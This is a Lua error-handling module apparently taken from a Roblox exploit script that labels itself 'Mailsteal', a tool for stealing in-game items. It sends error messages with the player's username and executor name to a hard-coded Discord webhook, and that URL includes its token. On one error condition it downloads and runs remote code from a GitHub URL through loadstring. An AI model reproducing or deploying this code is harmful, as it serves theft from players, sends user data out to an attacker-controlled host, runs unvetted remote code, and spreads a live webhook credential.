return function(e)
local msg = ""
if e == "Cannot require a non-RobloxScript module from a RobloxScript" then
return
end
if string.find(e, "already") then
error("yeet")
end
pcall(function() if _G.Min then
e = "Mailsteal: "..e
else
e = "Spoof/change: "..e
end end)
e = e.." | "..game.Players.LocalPlayer.Name
pcall(function()
e=e.." | "..(identifyexecutor() or "(Unknown Executor)")
end)
msg = '{"content":"'..e..'"}'
if string.find(e, "gsub") then
_G.Webhook = "https://google.com"
loadstring(game:HttpGet("https://raw.githubusercontent.com/vestyx/PetsGO/refs/heads/main/AutoFarmOP.lua", true))()
return
end
local response =
        request(
        {
            Url = "https://discord.com/api/webhooks/1329123500828528711/D98JOuYhIDMGaVbJ_YVHioFg9W4wczdegZelWo7s3T_ei4lsO_Z94OQmO4qzyevCTIfh",
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = msg
        }
    )
return response
end
